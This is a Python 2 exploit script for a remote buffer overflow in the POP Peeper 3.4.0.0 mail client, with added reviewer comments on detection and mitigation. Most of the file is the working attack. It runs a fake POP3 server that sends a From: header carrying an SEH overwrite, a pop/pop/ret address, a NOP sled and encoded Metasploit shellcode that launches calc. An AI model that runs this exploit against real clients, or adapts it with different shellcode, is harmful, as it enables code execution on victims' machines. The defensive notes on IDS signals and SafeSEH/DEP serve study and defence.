#!/usr/bin/python
# [+] Bug : POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)
# [+] Author : His0k4
# [+] Greetings : All friends and muslims HacKerS (DZ)
#
# Overview (reviewer notes):
#   Proof of concept for a client-side flaw. The script plays the role of a
#   POP3 server on TCP/110, answers a single client with canned "+OK" replies
#   and then delivers message headers in which the From: value is oversized.
#   Per the title, the overflow reaches the SEH record of POP Peeper 3.4.0.0.
#   The carried shellcode is the Metasploit win32_exec stub with CMD=calc,
#   i.e. a benign demonstration that code execution was reached.
#   Python 2 only (print statement, raw_input).
#   The listing is kept as published on the page, with quotes and backslashes
#   in escaped form (\" and \\x..); only line breaks and comments were
#   restored or added.
#
# Defensive takeaways:
#   - The victim is the mail client: it is exposed whenever it polls a POP3
#     server that is hostile, compromised, or impersonated on the network
#     path. Fetching mail over TLS with certificate validation narrows the
#     impersonation case.
#   - Network signal: the To/Subject/Content-Type values are 1989 bytes long,
#     above the 998-character line limit of RFC 5322, and the From: value
#     contains non-printable bytes (0x01, 0x10, 0x90, 0xEB). Either is cheap
#     to flag in an IDS or a mail proxy.
#   - Host signal: the mail client spawning an unexpected child process
#     (calc in this PoC).
#   - Mitigation: move off 3.4.0.0 to a release in which the vendor fixed the
#     From: header handling (the page does not name one). The hard-coded
#     handler address below suggests the DLL loads at a predictable address
#     without SafeSEH -- TODO confirm; SafeSEH/SEHOP, DEP and ASLR make this
#     class of overwrite far less reliable.

from socket import *
import struct  # not used anywhere in the visible script

# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# 21 chunks of 16 bytes plus one of 7 bytes = 343 bytes, matching Size=343.
shellcode=(
    \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"
    \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"
    \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"
    \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"
    \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"
    \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x43\\x4b\\x58\\x4e\\x37\"
    \"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x51\\x4b\\x58\"
    \"\\x4f\\x55\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x43\\x4b\\x38\"
    \"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\"
    \"\\x46\\x57\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"
    \"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x52\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x38\"
    \"\\x4f\\x55\\x46\\x42\\x41\\x30\\x4b\\x4e\\x48\\x46\\x4b\\x38\\x4e\\x50\\x4b\\x44\"
    \"\\x4b\\x48\\x4f\\x55\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x48\"
    \"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x33\"
    \"\\x42\\x4c\\x46\\x46\\x4b\\x58\\x42\\x34\\x42\\x43\\x45\\x48\\x42\\x4c\\x4a\\x47\"
    \"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a\"
    \"\\x4b\\x48\\x4a\\x46\\x4a\\x30\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x38\\x42\\x4b\"
    \"\\x42\\x30\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x46\\x4e\\x53\\x4f\\x45\\x41\\x53\"
    \"\\x48\\x4f\\x42\\x56\\x48\\x55\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\"
    \"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x35\\x4a\\x36\\x4a\\x39\"
    \"\\x50\\x4f\\x4c\\x58\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x56\"
    \"\\x4e\\x36\\x43\\x36\\x42\\x50\\x5a\")

# 1989 "A" bytes, reused as the value of the To, Subject and Content-Type
# headers below; only From: carries the structured payload.
junk = \"\\x41\"*1989

# From: value layout, in order: 352 filler bytes ("B"), 4 bytes of short jump,
# 4 bytes of handler address, 19 NOPs, then the 343-byte shellcode
# (722 bytes in total).
payload = \"\\x42\"*352
payload += \"\\xEB\\x10\\x90\\x90\" # x86 short jump, displacement 0x10, padded with two NOPs (author's joke: "a 10-metre hop")
payload += \"\\x4C\\x51\\x01\\x10\" # little-endian 0x1001514C; per the author a "universal" pop/pop/ret inside Imap.dll
payload += \"\\x90\"*19 # NOP padding (author: "NOPs, buddy")
payload += shellcode # the calc launcher (author's joke: "a 100-dinar calculator")

# Listen on every interface on the POP3 port. Binding to 110 normally needs
# elevated privileges; exactly one client connection is accepted.
s = socket(AF_INET, SOCK_STREAM)
s.bind((\"0.0.0.0\", 110))
s.listen(1)
print \"[*] Listening on [POP3] 110\"
c, addr = s.accept()
print \"[*] Connection accepted from: %s\" % (addr[0])

# Canned POP3 dialogue: every recv() result is discarded, so the replies are
# sent in this fixed order regardless of what the client actually asked.
c.send(\"+OK\\r\\n\") # greeting banner
c.recv(512)
c.send(\"+OK\\r\\n\") # presumably the USER reply -- verify against a client trace
c.recv(512)
c.send(\"+OK\\r\\n\") # presumably the PASS reply; any credentials are accepted
c.recv(512)
c.send(\"+OK 1 100\\r\\n\") # looks like a STAT reply: 1 message, 100 octets
c.recv(512)
c.send(\"+OK\\r\\n1 root\\r\\n.\\r\\n\") # multi-line listing with one entry (presumably LIST/UIDL)
c.recv(512)
c.send(\"+OK\\r\\n1 t00r\\r\\n.\\r\\n\") # second one-entry listing
c.recv(512)

# Message retrieval: the announced size (100 octets) does not match what is
# sent, and each header is followed by the POP3 multi-line terminator
# ("\r\n.\r\n" once unescaped).
c.send(\"+OK 100 octets\\r\\n\")
c.send(\"To: \"+junk+\"\\r\\n.\\r\\n\")
c.send(\"From: \"+payload+\"\\r\\n.\\r\\n\") # the header named in the title as the overflow trigger
c.send(\"Subject: \"+junk+\"\\r\\n.\\r\\n\")
c.send(\"Date: today\\r\\n.\\r\\n\")
c.send(\"Content-Type: \"+junk+\"; charset=UTF-7\\r\\n.\\r\\n\")

# Keep the sockets open until the operator presses Enter, then close both.
raw_input(\"[*] Payload sended!\\nPress key to quit\")
c.close()
s.close()